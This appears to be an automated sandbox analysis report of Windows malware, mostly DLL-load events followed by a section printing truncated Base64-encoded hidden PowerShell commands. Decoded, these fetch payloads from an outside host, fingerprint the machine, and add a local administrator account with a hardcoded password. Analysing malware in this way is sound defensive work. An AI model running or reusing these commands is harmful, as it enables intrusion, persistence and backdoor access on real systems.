Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll
Source: C:\Windows\System32\net.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net1.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\net1.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\net1.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: apphelp.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: version.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: edgegdi.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: icu.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: ntmarta.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: winhttp.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: mswsock.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: wshunix.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: winrnr.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: nlaapi.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: wshbth.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: devobj.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: napinsp.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: winsta.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: userenv.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: profapi.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: sspicli.dll
Source: C:\Windows\regedit.exe	Section loaded: authz.dll
Source: C:\Windows\regedit.exe	Section loaded: aclui.dll
Source: C:\Windows\regedit.exe	Section loaded: ulib.dll
Source: C:\Windows\regedit.exe	Section loaded: clb.dll
Source: C:\Windows\regedit.exe	Section loaded: uxtheme.dll
Source: C:\Windows\regedit.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\regedit.exe	Section loaded: xmllite.dll
Source: C:\Windows\regedit.exe	Section loaded: edgegdi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll

Source: C:\Windows\System32\systeminfo.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\systeminfo.exe "C:\Windows\system32\systeminfo.exe"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: bb.pdb source: powershell.exe, 00000004.00000002.3533295106.000002B4FB00D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: n.pdb\|r8 source: powershell.exe, 00000008.00000002.4453976855.00000223E5570000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: FromBase64String("Q0FnSUNSMllXeDFaU0E5SUNKaGNIQnNhV05oZEdsdmJpOXFjMjl1SWpzTkNnMEtJQ0FnSUNSb1pXRmtaWEp6V3lSclpYbGRJRDBnSkhaaGJIVmxPdzBLSUNBZ0lDUjFjbWtnUFNBaWFIUjBjSE02THk5cmFXNW5jMjFoYTJWeUxtTmhMelJqWW

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AMwA3AGUAMgBhADUANwA2ADcAOAAxAGYANgAwAGUAYQBlAGEANQA1AGUAMwA3ADkAYgBlADYAYQBlADAAMAA3ADcANgA0ADEAYgAzADkAZgA1ADkAMAA3ADkAMgA0AGQAOAA1ADIANAAyADQAMQBlADIAOQBiADcAYQA1ADMAYQA2ADEAMwBiADMAZAAzADcAZgA5ADAAZQAwADAANQBlADEAMQBiADkANgBkADYAMQAxADcANgAyADkAMAA0ADYAOQA5ADAAYwAxAGQAZgA3ADkAYQBhADkANwAzADUAMgA4ADkAMwAwADgAYwAxAGIAMgBmAGEAOQBlAGQAZQBlAGEANABkAGMANQBmAGUANQBhADAAOQBiAGYAOQBiADIANwA3ADMAZQBlAGEAZgA5ADAAOQA1ADAAYgA2ADkANgBmAGUAMQAwAGMAYwA5AGQAYgAzADcANAA1AGIANQAxADUAMQBlADQAYgAwADAAMABhADcAOQAxADIAMQAzAGMAZgA5ADMAZgAyADUAMAA3ADAAZgA1ADgAOQBiADQAMABmAGQAMwBlADMAOQBjADQAYQAxADgAZQBkAGEAZAAyACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAG
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAc